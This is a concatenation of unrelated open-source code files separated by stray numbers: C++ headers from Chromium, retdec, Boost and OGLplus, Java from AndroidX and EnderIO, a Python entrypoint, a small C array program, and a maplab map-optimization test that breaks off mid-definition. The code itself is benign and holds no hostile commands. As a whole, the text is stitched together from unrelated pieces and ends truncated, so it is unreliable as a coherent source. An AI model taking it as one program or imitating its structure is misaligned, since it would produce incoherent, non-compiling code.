# This improves the model by 0.2~0.3% according to https://arxiv.org/abs/1706.02677 for m in self.modules(): if isinstance(m, BasicBlock): nn.init.constant_(m.bn2.weight, 0) self.logger.debug(self) def _make_layer(self, block, planes, blocks, stride=1): if blocks == 0: return nn.Sequential(nn.Identity()) norm_layer = self._norm_layer upsample = None if stride != 1: upsample = nn.Sequential( nn.UpsamplingNearest2d(scale_factor=2), SpectralNorm(conv1x1(self.inplanes, planes * block.expansion)), norm_layer(planes * block.expansion), ) elif self.inplanes != planes * block.expansion: upsample = nn.Sequential( SpectralNorm(conv1x1(self.inplanes, planes * block.expansion)), norm_layer(planes * block.expansion), ) layers = [block(self.inplanes, planes, stride, upsample, norm_layer, self.large_kernel)] self.inplanes = planes * block.expansion for _ in range(1, blocks): layers.append(block(self.inplanes, planes, norm_layer=norm_layer, large_kernel=self.large_kernel)) return nn.Sequential(*layers) def forward(self, x, mid_fea): x = self.layer1(x) # N x 256 x 32 x 32 x = self.layer2(x) # N x 128 x 64 x 64 x = self.layer3(x) # N x 64 x 128 x 128 x = self.layer4(x) # N x 32 x 256 x 256 x = self.conv1(x) x = self.bn1(x) x = self.leaky_relu(x) x = self.conv2(x) alpha = (self.tanh(x) + 1.0) / 2.0 return alpha, None
2,779
14,668
<gh_stars>1000+ // Copyright (c) 2012 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #ifndef CONTENT_PUBLIC_TEST_MOCK_RENDER_THREAD_H_ #define CONTENT_PUBLIC_TEST_MOCK_RENDER_THREAD_H_ #include <stddef.h> #include <stdint.h> #include <string> #include "base/observer_list.h" #include "base/task/single_thread_task_runner.h" #include "build/build_config.h" #include "content/public/common/widget_type.h" #include "content/public/renderer/render_thread.h" #include "ipc/ipc_test_sink.h" #include "ipc/message_filter.h" #include "mojo/public/cpp/bindings/pending_receiver.h" #include "third_party/blink/public/mojom/browser_interface_broker.mojom.h" namespace IPC { class MessageFilter; class MessageReplyDeserializer; } namespace content { namespace mojom { class CreateNewWindowParams; class CreateNewWindowReply; class Frame; class RenderMessageFilter; } // This class is a very simple mock of RenderThread. It simulates an IPC channel // which supports the following message: // FrameHostMsg_CreateChildFrame : sync message sent by the renderer. class MockRenderThread : public RenderThread { public: MockRenderThread(); ~MockRenderThread() override; // Provides access to the messages that have been received by this thread. IPC::TestSink& sink() { return sink_; } void SetIOTaskRunner( scoped_refptr<base::SingleThreadTaskRunner> task_runner) { io_task_runner_ = std::move(task_runner); } // RenderThread implementation: bool Send(IPC::Message* msg) override; IPC::SyncChannel* GetChannel() override; std::string GetLocale() override; IPC::SyncMessageFilter* GetSyncMessageFilter() override; scoped_refptr<base::SingleThreadTaskRunner> GetIOTaskRunner() override; void BindHostReceiver(mojo::GenericPendingReceiver receiver) override; void AddRoute(int32_t routing_id, IPC::Listener* listener) override; void AttachTaskRunnerToRoute( int32_t routing_id, scoped_refptr<base::SingleThreadTaskRunner> task_runner) override; void RemoveRoute(int32_t routing_id) override; int GenerateRoutingID() override; bool GenerateFrameRoutingID( int32_t& routing_id, blink::LocalFrameToken& frame_token, base::UnguessableToken& devtools_frame_token) override; void AddFilter(IPC::MessageFilter* filter) override; void RemoveFilter(IPC::MessageFilter* filter) override; void AddObserver(RenderThreadObserver* observer) override; void RemoveObserver(RenderThreadObserver* observer) override; void SetResourceRequestSenderDelegate( blink::WebResourceRequestSenderDelegate* delegate) override; void RecordAction(const base::UserMetricsAction& action) override; void RecordComputedAction(const std::string& action) override; void RegisterExtension(std::unique_ptr<v8::Extension> extension) override; int PostTaskToAllWebWorkers(base::RepeatingClosure closure) override; base::WaitableEvent* GetShutdownEvent() override; int32_t GetClientId() override; void SetRendererProcessType( blink::scheduler::WebRendererProcessType type) override; blink::WebString GetUserAgent() override; blink::WebString GetReducedUserAgent() override; const blink::UserAgentMetadata& GetUserAgentMetadata() override; bool IsUseZoomForDSF() override; #if defined(OS_WIN) void PreCacheFont(const LOGFONT& log_font) override; void ReleaseCachedFonts() override; #endif void SetFieldTrialGroup(const std::string& trial_name, const std::string& group_name) override; void SetUseZoomForDSFEnabled(bool zoom_for_dsf); void WriteIntoTrace( 
perfetto::TracedProto<perfetto::protos::pbzero::RenderProcessHost> proto) override; // Returns a new, unique routing ID that can be assigned to the next view, // widget, or frame. int32_t GetNextRoutingID(); // Dispatches control messages to observers. bool OnControlMessageReceived(const IPC::Message& msg); base::ObserverList<RenderThreadObserver>::Unchecked& observers() { return observers_; } // The View expects to be returned a valid |reply.route_id| different from its // own. We do not keep track of the newly created widget in MockRenderThread, // so it must be cleaned up on its own. void OnCreateWindow(const mojom::CreateNewWindowParams& params, mojom::CreateNewWindowReply* reply); void OnCreateChildFrame( int32_t child_routing_id, mojo::PendingAssociatedRemote<mojom::Frame> frame_remote, mojo::PendingReceiver<blink::mojom::BrowserInterfaceBroker> browser_interface_broker); // Returns the receiver end of the BrowserInterfaceBroker interface whose // client end was passed in to construct RenderFrame with |routing_id|; if // any. The client end will be used by the RenderFrame to service interface // requests originating from the initial empty document. mojo::PendingReceiver<blink::mojom::BrowserInterfaceBroker> TakeInitialBrowserInterfaceBrokerReceiverForFrame(int32_t routing_id); protected: // This function operates as a regular IPC listener. Subclasses // overriding this should first delegate to this implementation. virtual bool OnMessageReceived(const IPC::Message& msg); IPC::TestSink sink_; scoped_refptr<base::SingleThreadTaskRunner> io_task_runner_; // Routing ID what will be assigned to the next view, widget, or frame. int32_t next_routing_id_; // Pending BrowserInterfaceBrokers sent from the renderer when creating a // new Frame and informing the browser. std::map<int32_t, mojo::PendingReceiver<blink::mojom::BrowserInterfaceBroker>> frame_routing_id_to_initial_browser_brokers_; // The last known good deserializer for sync messages. std::unique_ptr<IPC::MessageReplyDeserializer> reply_deserializer_; // A list of message filters added to this thread. std::vector<scoped_refptr<IPC::MessageFilter> > filters_; // Observers to notify. base::ObserverList<RenderThreadObserver>::Unchecked observers_; std::unique_ptr<mojom::RenderMessageFilter> mock_render_message_filter_; bool zoom_for_dsf_ = false; }; } // namespace content #endif // CONTENT_PUBLIC_TEST_MOCK_RENDER_THREAD_H_
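A schematic of how a renderer-side unit test might use this mock; the function below is hypothetical and details shift between Chromium revisions:

#include "content/public/test/mock_render_thread.h"

// Hypothetical test sketch: MockRenderThread stands in for the real RenderThread,
// so code under test can Send() legacy IPC messages without a browser process.
void ExerciseMockRenderThread() {
  content::MockRenderThread render_thread;

  // Hand out ids the way RenderViewTest-style fixtures do.
  int32_t routing_id = render_thread.GetNextRoutingID();
  (void)routing_id;

  // Messages sent by the code under test are captured by the test sink and can
  // be inspected afterwards, e.g. via render_thread.sink().GetMessageAt(0).
}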
2,012
460
#include "../../../tools/assistant/lib/fulltextsearch/qquery_p.h"
26
836
<filename>runner/android_junit_runner/java/androidx/test/internal/runner/listener/TraceRunListener.java /* * Copyright (C) 2021 The Android Open Source Project * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package androidx.test.internal.runner.listener; import android.util.Log; import androidx.tracing.Trace; import org.junit.runner.Description; import org.junit.runner.notification.RunListener; /** A JUnit RunListener that reports {@link android.os.Trace} info for each test case */ public class TraceRunListener extends RunListener { private Thread startedThread = null; @Override public void testStarted(Description description) throws Exception { startedThread = Thread.currentThread(); String testClassName = description.getTestClass() != null ? description.getTestClass().getSimpleName() : "None"; String methodName = description.getMethodName() != null ? description.getMethodName() : "None"; Trace.beginSection(testClassName + "#" + methodName); } @Override public void testFinished(Description description) throws Exception { if (Thread.currentThread().equals(startedThread)) { Trace.endSection(); } else { // Trace expects the begin/end section calls to be on same thread. // Listeners should always be invoked on test/instrumentation thread, // but log an error in case this changes. Log.e("TraceRunListener", "testFinished called on different thread than testStarted"); } startedThread = null; } }
575
575
// Copyright (c) 2012 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #ifndef CHROME_BROWSER_CAPTIVE_PORTAL_CAPTIVE_PORTAL_SERVICE_FACTORY_H_ #define CHROME_BROWSER_CAPTIVE_PORTAL_CAPTIVE_PORTAL_SERVICE_FACTORY_H_ #include "base/compiler_specific.h" #include "base/macros.h" #include "base/memory/singleton.h" #include "components/keyed_service/content/browser_context_keyed_service_factory.h" class Profile; namespace captive_portal { class CaptivePortalService; } // Singleton that owns all captive_portal::CaptivePortalServices and associates // them with Profiles. Listens for the Profile's destruction notification and // cleans up the associated captive_portal::CaptivePortalService. Incognito // profiles have their own captive_portal::CaptivePortalService. class CaptivePortalServiceFactory : public BrowserContextKeyedServiceFactory { public: // Returns the captive_portal::CaptivePortalService for |profile|. static captive_portal::CaptivePortalService* GetForProfile(Profile* profile); static CaptivePortalServiceFactory* GetInstance(); private: friend class CaptivePortalBrowserTest; friend class CaptivePortalServiceTest; friend struct base::DefaultSingletonTraits<CaptivePortalServiceFactory>; CaptivePortalServiceFactory(); ~CaptivePortalServiceFactory() override; // BrowserContextKeyedServiceFactory: KeyedService* BuildServiceInstanceFor( content::BrowserContext* profile) const override; content::BrowserContext* GetBrowserContextToUse( content::BrowserContext* context) const override; DISALLOW_COPY_AND_ASSIGN(CaptivePortalServiceFactory); }; #endif // CHROME_BROWSER_CAPTIVE_PORTAL_CAPTIVE_PORTAL_SERVICE_FACTORY_H_
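For completeness, the usual call-site shape for a BrowserContextKeyedServiceFactory like this one (the wrapper function is only illustrative):

#include "chrome/browser/captive_portal/captive_portal_service_factory.h"

// Illustrative only: per-profile lookup; the factory creates the service on
// first use and ties its lifetime to the Profile.
captive_portal::CaptivePortalService* GetCaptivePortalService(Profile* profile) {
  return CaptivePortalServiceFactory::GetForProfile(profile);
}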
545
4,816
/** * @file include/retdec/config/config_exceptions.h * @brief Definitions of config exceptions. * @copyright (c) 2017 Avast Software, licensed under the MIT license */ #ifndef RETDEC_CONFIG_CONFIG_EXCEPTIONS_H #define RETDEC_CONFIG_CONFIG_EXCEPTIONS_H #include <exception> #include <string> namespace retdec { namespace config { /** * Base class for Config exceptions which can be thrown to the outside world (library users). */ class Exception : public std::exception { }; /** * Config exception which can be thrown to the outside world (library users). * It represents an error during JSON parsing. * It contains an error message and line and column in JSON where error occurred. */ class ParseException : public Exception { public: ParseException( const std::string& message, std::size_t line, std::size_t column) : _message(message), _line(line), _column(column), _whatMessage(_message + " @ line = " + std::to_string(_line) + ", column = " + std::to_string(_column)) { } std::string getMessage() const { return _message; } std::size_t getLine() const { return _line; } std::size_t getColumn() const { return _column; } /** * @return Single throw message constructed from error message * and error line and column in JSON. */ virtual const char* what() const noexcept override { return _whatMessage.c_str(); } private: /// Error message. std::string _message; /// Line in JSON where error occurred. std::size_t _line = 0; /// Column in JSON where error occurred. std::size_t _column = 0; /// Message returned by @c what() method. std::string _whatMessage; }; /** * Config exception which can be thrown to the outside world (library users). * It is thrown when provided input file can not be opened. */ class FileNotFoundException : public Exception { public: FileNotFoundException(const std::string& message) : _whatMessage(message) { } virtual const char* what() const noexcept override { return _whatMessage.c_str(); } private: /// Message returned by @c what() method. std::string _whatMessage; }; } // namespace config } // namespace retdec #endif
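Because these exception types are header-only, a self-contained demonstration is easy; the throw below merely stands in for an error reported by retdec's JSON config parser:

#include <iostream>
#include "retdec/config/config_exceptions.h"

int main()
{
    try
    {
        // Stand-in for a failing JSON parse somewhere inside the config library.
        throw retdec::config::ParseException("unexpected token", 12, 34);
    }
    catch (const retdec::config::ParseException& e)
    {
        // what() combines message, line and column:
        // "unexpected token @ line = 12, column = 34"
        std::cerr << e.what() << '\n';
        std::cerr << "line " << e.getLine() << ", column " << e.getColumn() << '\n';
    }
    return 0;
}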
762
789
from hailtop.hail_logging import configure_logging # configure logging before importing anything else configure_logging() from .memory import run # noqa: E402 pylint: disable=wrong-import-position run()
61
721
package crazypants.enderio.base.item.darksteel.upgrade.hoe; import java.util.List; import javax.annotation.Nonnull; import com.enderio.core.common.util.NNList; import crazypants.enderio.api.upgrades.IDarkSteelItem; import crazypants.enderio.api.upgrades.IDarkSteelUpgrade; import crazypants.enderio.api.upgrades.IRule; import crazypants.enderio.base.EnderIO; import crazypants.enderio.base.config.config.DarkSteelConfig; import crazypants.enderio.base.handler.darksteel.AbstractUpgrade; import crazypants.enderio.base.handler.darksteel.Rules; import crazypants.enderio.base.item.darksteel.upgrade.energy.EnergyUpgrade; import crazypants.enderio.base.item.darksteel.upgrade.energy.EnergyUpgradeManager; import crazypants.enderio.base.lang.Lang; import net.minecraft.item.ItemStack; import net.minecraftforge.event.RegistryEvent; import net.minecraftforge.fml.common.Mod.EventBusSubscriber; import net.minecraftforge.fml.common.eventhandler.SubscribeEvent; @EventBusSubscriber(modid = EnderIO.MODID) public class HoeUpgrade extends AbstractUpgrade { private static final @Nonnull String UPGRADE_NAME = "hoe"; public static final @Nonnull HoeUpgrade INSTANCE = new HoeUpgrade(); @SubscribeEvent public static void registerDarkSteelUpgrades(@Nonnull RegistryEvent.Register<IDarkSteelUpgrade> event) { event.getRegistry().register(INSTANCE); } public HoeUpgrade() { super(UPGRADE_NAME, "enderio.darksteel.upgrade.hoe", DarkSteelConfig.darkSteelHoeCost); } @Override @Nonnull public List<IRule> getRules() { return new NNList<>(Rules.callbacksFor(this), EnergyUpgrade.HAS_ANY, Rules.itemTypeTooltip(Lang.DSU_CLASS_TOOLS_AXE), Rules.itemTypeTooltip(Lang.DSU_CLASS_TOOLS_CROOK)); } @Override public boolean canOtherBeRemoved(@Nonnull ItemStack stack, @Nonnull IDarkSteelItem item, @Nonnull IDarkSteelUpgrade other) { return !EnergyUpgradeManager.isLowestPowerUpgrade(other); } }
640
364
<filename>implement/oglplus/enums/pixel_data_type_range.ipp // File implement/oglplus/enums/pixel_data_type_range.ipp // // Automatically generated file, DO NOT modify manually. // Edit the source 'source/enums/oglplus/pixel_data_type.txt' // or the 'source/enums/make_enum.py' script instead. // // Copyright 2010-2019 <NAME>. // Distributed under the Boost Software License, Version 1.0. // See accompanying file LICENSE_1_0.txt or copy at // http://www.boost.org/LICENSE_1_0.txt // namespace enums { OGLPLUS_LIB_FUNC aux::CastIterRange< const GLenum*, PixelDataType > ValueRange_(PixelDataType*) #if (!OGLPLUS_LINK_LIBRARY || defined(OGLPLUS_IMPLEMENTING_LIBRARY)) && \ !defined(OGLPLUS_IMPL_EVR_PIXELDATATYPE) #define OGLPLUS_IMPL_EVR_PIXELDATATYPE { static const GLenum _values[] = { #if defined GL_UNSIGNED_BYTE GL_UNSIGNED_BYTE, #endif #if defined GL_BYTE GL_BYTE, #endif #if defined GL_UNSIGNED_SHORT GL_UNSIGNED_SHORT, #endif #if defined GL_SHORT GL_SHORT, #endif #if defined GL_UNSIGNED_INT GL_UNSIGNED_INT, #endif #if defined GL_INT GL_INT, #endif #if defined GL_HALF_FLOAT GL_HALF_FLOAT, #endif #if defined GL_FLOAT GL_FLOAT, #endif #if defined GL_UNSIGNED_BYTE_3_3_2 GL_UNSIGNED_BYTE_3_3_2, #endif #if defined GL_UNSIGNED_BYTE_2_3_3_REV GL_UNSIGNED_BYTE_2_3_3_REV, #endif #if defined GL_UNSIGNED_SHORT_5_6_5 GL_UNSIGNED_SHORT_5_6_5, #endif #if defined GL_UNSIGNED_SHORT_5_6_5_REV GL_UNSIGNED_SHORT_5_6_5_REV, #endif #if defined GL_UNSIGNED_SHORT_4_4_4_4 GL_UNSIGNED_SHORT_4_4_4_4, #endif #if defined GL_UNSIGNED_SHORT_4_4_4_4_REV GL_UNSIGNED_SHORT_4_4_4_4_REV, #endif #if defined GL_UNSIGNED_SHORT_5_5_5_1 GL_UNSIGNED_SHORT_5_5_5_1, #endif #if defined GL_UNSIGNED_SHORT_1_5_5_5_REV GL_UNSIGNED_SHORT_1_5_5_5_REV, #endif #if defined GL_UNSIGNED_INT_8_8_8_8 GL_UNSIGNED_INT_8_8_8_8, #endif #if defined GL_UNSIGNED_INT_8_8_8_8_REV GL_UNSIGNED_INT_8_8_8_8_REV, #endif #if defined GL_UNSIGNED_INT_10_10_10_2 GL_UNSIGNED_INT_10_10_10_2, #endif #if defined GL_UNSIGNED_INT_2_10_10_10_REV GL_UNSIGNED_INT_2_10_10_10_REV, #endif #if defined GL_UNSIGNED_INT_24_8 GL_UNSIGNED_INT_24_8, #endif #if defined GL_UNSIGNED_INT_10F_11F_11F_REV GL_UNSIGNED_INT_10F_11F_11F_REV, #endif #if defined GL_UNSIGNED_INT_5_9_9_9_REV GL_UNSIGNED_INT_5_9_9_9_REV, #endif #if defined GL_FLOAT_32_UNSIGNED_INT_24_8_REV GL_FLOAT_32_UNSIGNED_INT_24_8_REV, #endif 0 }; return aux::CastIterRange< const GLenum*, PixelDataType >(_values, _values+sizeof(_values)/sizeof(_values[0])-1); } #else ; #endif } // namespace enums
1,207
2,960
#include <stdio.h> #include <stdlib.h> int removeElement(int *nums, int numsSize, int val) { int i, count = 0; for (i = 0; i < numsSize; i++) { if (nums[i] != val) { nums[count++] = nums[i]; } } return count; } int main(int argc, char **argv) { int i; if (argc < 2) { fprintf(stderr, "usage: %s val [nums...]\n", argv[0]); return 1; } int *nums = malloc((argc - 2) * sizeof(int)); for (i = 0; i < argc - 2; i++) { nums[i] = atoi(argv[i + 2]); } int count = removeElement(nums, argc - 2, atoi(argv[1])); for (i = 0; i < count; i++) { printf("%d ", nums[i]); } printf("\n"); free(nums); return 0; }
314
1,256
#pragma once #include "FarPluginBase.hpp" #include "SystemApi.hpp" #include "strmix.hpp" #include "debug.h" #include "makeguid.h" #include "AnsiGuard.hpp" #include "D5D/d5dformat.h" #include "D5D/d5dlanguage.h" #include "../../API/module.hpp" class D5DModule; class D5DPlugin; class D5DArchive; class D5DLanguage; #include "d5d.Archive.h" #include "d5d.Plugin.h" #include "d5d.Module.h" #include "d5d.Language.h"
195
3,799
<filename>core/core/src/main/java/androidx/core/content/pm/ShortcutInfoCompatSaver.java /* * Copyright 2018 The Android Open Source Project * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package androidx.core.content.pm; import static androidx.annotation.RestrictTo.Scope.LIBRARY; import static androidx.annotation.RestrictTo.Scope.LIBRARY_GROUP_PREFIX; import androidx.annotation.AnyThread; import androidx.annotation.RestrictTo; import androidx.annotation.WorkerThread; import java.util.ArrayList; import java.util.List; /** * Defines APIs to access and update a persistable list of {@link ShortcutInfoCompat}. This class * is no-op as is and may be overridden to provide the required functionality. * * @hide */ @RestrictTo(LIBRARY_GROUP_PREFIX) public abstract class ShortcutInfoCompatSaver<T> { @AnyThread public abstract T addShortcuts(List<ShortcutInfoCompat> shortcuts); @AnyThread public abstract T removeShortcuts(List<String> shortcutIds); @AnyThread public abstract T removeAllShortcuts(); @WorkerThread public List<ShortcutInfoCompat> getShortcuts() throws Exception { return new ArrayList<>(); } /** * Implementation that does nothing and returns null from asynchronous methods. * * @hide */ @RestrictTo(LIBRARY) public static class NoopImpl extends ShortcutInfoCompatSaver<Void> { @Override public Void addShortcuts(List<ShortcutInfoCompat> shortcuts) { return null; } @Override public Void removeShortcuts(List<String> shortcutIds) { return null; } @Override public Void removeAllShortcuts() { return null; } } }
750
8,865
<filename>atlas-aapt/frameworks/base/libs/androidfw/tests/AttributeFinder_test.cpp /* * Copyright (C) 2014 The Android Open Source Project * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ #include <androidfw/AttributeFinder.h> #include <gtest/gtest.h> using android::BackTrackingAttributeFinder; class MockAttributeFinder : public BackTrackingAttributeFinder<MockAttributeFinder, int> { public: MockAttributeFinder(const uint32_t* attrs, int len) : BackTrackingAttributeFinder(0, len) { mAttrs = new uint32_t[len]; memcpy(mAttrs, attrs, sizeof(*attrs) * len); } ~MockAttributeFinder() { delete mAttrs; } inline uint32_t getAttribute(const int index) const { return mAttrs[index]; } private: uint32_t* mAttrs; }; static const uint32_t sortedAttributes[] = { 0x01010000, 0x01010001, 0x01010002, 0x01010004, 0x02010001, 0x02010010, 0x7f010001 }; static const uint32_t packageUnsortedAttributes[] = { 0x02010001, 0x02010010, 0x01010000, 0x01010001, 0x01010002, 0x01010004, 0x7f010001 }; static const uint32_t singlePackageAttributes[] = { 0x7f010007, 0x7f01000a, 0x7f01000d, 0x00000000 }; TEST(AttributeFinderTest, IteratesSequentially) { const int end = sizeof(sortedAttributes) / sizeof(*sortedAttributes); MockAttributeFinder finder(sortedAttributes, end); EXPECT_EQ(0, finder.find(0x01010000)); EXPECT_EQ(1, finder.find(0x01010001)); EXPECT_EQ(2, finder.find(0x01010002)); EXPECT_EQ(3, finder.find(0x01010004)); EXPECT_EQ(4, finder.find(0x02010001)); EXPECT_EQ(5, finder.find(0x02010010)); EXPECT_EQ(6, finder.find(0x7f010001)); EXPECT_EQ(end, finder.find(0x7f010002)); } TEST(AttributeFinderTest, PackagesAreOutOfOrder) { const int end = sizeof(sortedAttributes) / sizeof(*sortedAttributes); MockAttributeFinder finder(sortedAttributes, end); EXPECT_EQ(6, finder.find(0x7f010001)); EXPECT_EQ(end, finder.find(0x7f010002)); EXPECT_EQ(4, finder.find(0x02010001)); EXPECT_EQ(5, finder.find(0x02010010)); EXPECT_EQ(0, finder.find(0x01010000)); EXPECT_EQ(1, finder.find(0x01010001)); EXPECT_EQ(2, finder.find(0x01010002)); EXPECT_EQ(3, finder.find(0x01010004)); } TEST(AttributeFinderTest, SomeAttributesAreNotFound) { const int end = sizeof(sortedAttributes) / sizeof(*sortedAttributes); MockAttributeFinder finder(sortedAttributes, end); EXPECT_EQ(0, finder.find(0x01010000)); EXPECT_EQ(1, finder.find(0x01010001)); EXPECT_EQ(2, finder.find(0x01010002)); EXPECT_EQ(end, finder.find(0x01010003)); EXPECT_EQ(3, finder.find(0x01010004)); EXPECT_EQ(end, finder.find(0x01010005)); EXPECT_EQ(end, finder.find(0x01010006)); EXPECT_EQ(4, finder.find(0x02010001)); EXPECT_EQ(end, finder.find(0x02010002)); } TEST(AttributeFinderTest, FindAttributesInPackageUnsortedAttributeList) { const int end = sizeof(packageUnsortedAttributes) / sizeof(*packageUnsortedAttributes); MockAttributeFinder finder(packageUnsortedAttributes, end); EXPECT_EQ(2, finder.find(0x01010000)); EXPECT_EQ(3, finder.find(0x01010001)); EXPECT_EQ(4, finder.find(0x01010002)); EXPECT_EQ(end, finder.find(0x01010003)); EXPECT_EQ(5, finder.find(0x01010004)); EXPECT_EQ(end, finder.find(0x01010005)); 
EXPECT_EQ(end, finder.find(0x01010006)); EXPECT_EQ(0, finder.find(0x02010001)); EXPECT_EQ(end, finder.find(0x02010002)); EXPECT_EQ(1, finder.find(0x02010010)); EXPECT_EQ(6, finder.find(0x7f010001)); } TEST(AttributeFinderTest, FindAttributesInSinglePackageAttributeList) { const int end = sizeof(singlePackageAttributes) / sizeof(*singlePackageAttributes); MockAttributeFinder finder(singlePackageAttributes, end); EXPECT_EQ(end, finder.find(0x010100f4)); EXPECT_EQ(end, finder.find(0x010100f5)); EXPECT_EQ(end, finder.find(0x010100f6)); EXPECT_EQ(end, finder.find(0x010100f7)); EXPECT_EQ(end, finder.find(0x010100f8)); EXPECT_EQ(end, finder.find(0x010100fa)); EXPECT_EQ(0, finder.find(0x7f010007)); }
1,947
17,104
<filename>mars/boost/predef/architecture/x86/64.h /* Copyright <NAME> 2008-2015 Distributed under the Boost Software License, Version 1.0. (See accompanying file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt) */ #ifndef BOOST_PREDEF_ARCHITECTURE_X86_64_H #define BOOST_PREDEF_ARCHITECTURE_X86_64_H #include <boost/predef/version_number.h> #include <boost/predef/make.h> /*` [heading `BOOST_ARCH_X86_64`] [@http://en.wikipedia.org/wiki/Ia64 Intel IA-64] architecture. [table [[__predef_symbol__] [__predef_version__]] [[`__x86_64`] [__predef_detection__]] [[`__x86_64__`] [__predef_detection__]] [[`__amd64__`] [__predef_detection__]] [[`__amd64`] [__predef_detection__]] [[`_M_X64`] [__predef_detection__]] ] */ #define BOOST_ARCH_X86_64 BOOST_VERSION_NUMBER_NOT_AVAILABLE #if defined(__x86_64) || defined(__x86_64__) || \ defined(__amd64__) || defined(__amd64) || \ defined(_M_X64) # undef BOOST_ARCH_X86_64 # define BOOST_ARCH_X86_64 BOOST_VERSION_NUMBER_AVAILABLE #endif #if BOOST_ARCH_X86_64 # define BOOST_ARCH_X86_64_AVAILABLE #endif #define BOOST_ARCH_X86_64_NAME "Intel x86-64" #include <boost/predef/architecture/x86.h> #endif #include <boost/predef/detail/test.h> BOOST_PREDEF_DECLARE_TEST(BOOST_ARCH_X86_64,BOOST_ARCH_X86_64_NAME)
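A minimal consumer sketch for the macros defined above, assuming the stock Boost.Predef include layout; it relies only on BOOST_ARCH_X86_64_AVAILABLE and BOOST_ARCH_X86_64_NAME, both of which come from this header:

#include <iostream>
#include <boost/predef/architecture/x86/64.h>

int main()
{
#if defined(BOOST_ARCH_X86_64_AVAILABLE)
    // Set by the header only when one of the x86-64 detection macros was seen.
    std::cout << "Compiled for " << BOOST_ARCH_X86_64_NAME << "\n";
#else
    std::cout << "Not an x86-64 build\n";
#endif
    return 0;
}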
664
1,936
<filename>algorithms/map-optimization-legacy/test/test_remove_mission_test.cc #include <gtest/gtest.h> #include <maplab-common/test/testing-entrypoint.h> #include <maplab-common/test/testing-predicates.h> #include <vi-map/check-map-consistency.h> #include "map-optimization-legacy/test/6dof-vi-map-gen.h" namespace map_optimization_legacy { class RemoveMissionTest : public testing::Test { public: RemoveMissionTest() : generator_(), map_(generator_.vi_map_) { // Create a map with 2 missions. generator_.generateVIMap(); first_mission_id_ = map_.getIdOfFirstMission(); map_.duplicateMission(first_mission_id_); } void addCrossMissionObservations() { vi_map::MissionId other_mission_id; vi_map::MissionId first_mission_id = map_.getIdOfFirstMission(); const vi_map::VIMission& first_mission = map_.getMission(first_mission_id); pose_graph::VertexId first_vertex_id = first_mission.getRootVertexId(); // Get other mission ID. vi_map::MissionIdList mission_ids; map_.getAllMissionIds(&mission_ids); for (const vi_map::MissionId& mission_id : mission_ids) { if (mission_id != first_mission_id) { other_mission_id = mission_id; break; } } CHECK(other_mission_id.isValid()); const vi_map::VIMission& other_mission = map_.getMission(other_mission_id); pose_graph::VertexId other_vertex_id = other_mission.getRootVertexId(); // Merge a couple of landmarks. const unsigned int merge_every_nth_landmark = 5; unsigned int landmark_count = 0; do { vi_map::Vertex& first_vertex = map_.getVertex(first_vertex_id); vi_map::Vertex& other_vertex = map_.getVertex(other_vertex_id); vi_map::LandmarkIdList first_vertex_list, other_vertex_list; first_vertex.getStoredLandmarkIdList(&first_vertex_list); other_vertex.getStoredLandmarkIdList(&other_vertex_list); ASSERT_EQ(first_vertex_list.size(), other_vertex_list.size()); for (size_t i = 0; i < first_vertex_list.size(); ++i) { if (landmark_count % merge_every_nth_landmark == 0) { map_.mergeLandmarks(first_vertex_list[i], other_vertex_list[i]); } ++landmark_count; } // Also swap observed landmark IDs of some landmarks so we have landmark // observations shared across missions too. 
vi_map::LandmarkIdList first_vertex_observed_landmark_list; vi_map::LandmarkIdList other_vertex_observed_landmark_list; first_vertex.getFrameObservedLandmarkIds( 0, &first_vertex_observed_landmark_list); other_vertex.getFrameObservedLandmarkIds( 0, &other_vertex_observed_landmark_list); const unsigned int swap_every_nth_landmark = 9; landmark_count = 0; for (size_t i = 0; i < first_vertex_observed_landmark_list.size(); ++i) { if (landmark_count % swap_every_nth_landmark == 0) { other_vertex.setObservedLandmarkId(0, i, vi_map::LandmarkId()); map_.getLandmark(other_vertex_observed_landmark_list[i]) .removeAllObservationsOfVertexAndFrame(other_vertex_id, 0); map_.associateKeypointWithExistingLandmark( other_vertex_id, 0, i, first_vertex_observed_landmark_list[i]); } ++landmark_count; } } while (map_.getNextVertex( first_vertex_id, pose_graph::Edge::EdgeType::kViwls, &first_vertex_id) && map_.getNextVertex( other_vertex_id, pose_graph::Edge::EdgeType::kViwls, &other_vertex_id)); } void addNonChronologicalLandmarkMerges() { vi_map::MissionIdList mission_ids; map_.getAllMissionIds(&mission_ids); for (const vi_map::MissionId& mission_id : mission_ids) { pose_graph::VertexIdList mission_vertex_ids; map_.getAllVertexIdsInMission(mission_id, &mission_vertex_ids); CHECK_GT(mission_vertex_ids.size(), 3u); const pose_graph::VertexId& first_vertex_id = mission_vertex_ids[0]; const pose_graph::VertexId& second_vertex_id = mission_vertex_ids[2]; CHECK_GT(map_.getVertex(first_vertex_id).getLandmarks().size(), 0u); CHECK_GT(map_.getVertex(second_vertex_id).getLandmarks().size(), 0u); const vi_map::LandmarkId first_vertex_landmark = map_.getVertex(first_vertex_id).getLandmarks().begin()->id(); const vi_map::LandmarkId second_vertex_landmark = map_.getVertex(second_vertex_id).getLandmarks().begin()->id(); map_.mergeLandmarks(first_vertex_landmark, second_vertex_landmark); } } protected: SixDofVIMapGenerator generator_; vi_map::VIMap& map_; vi_map::MissionId first_mission_id_; }; TEST_F(RemoveMissionTest, 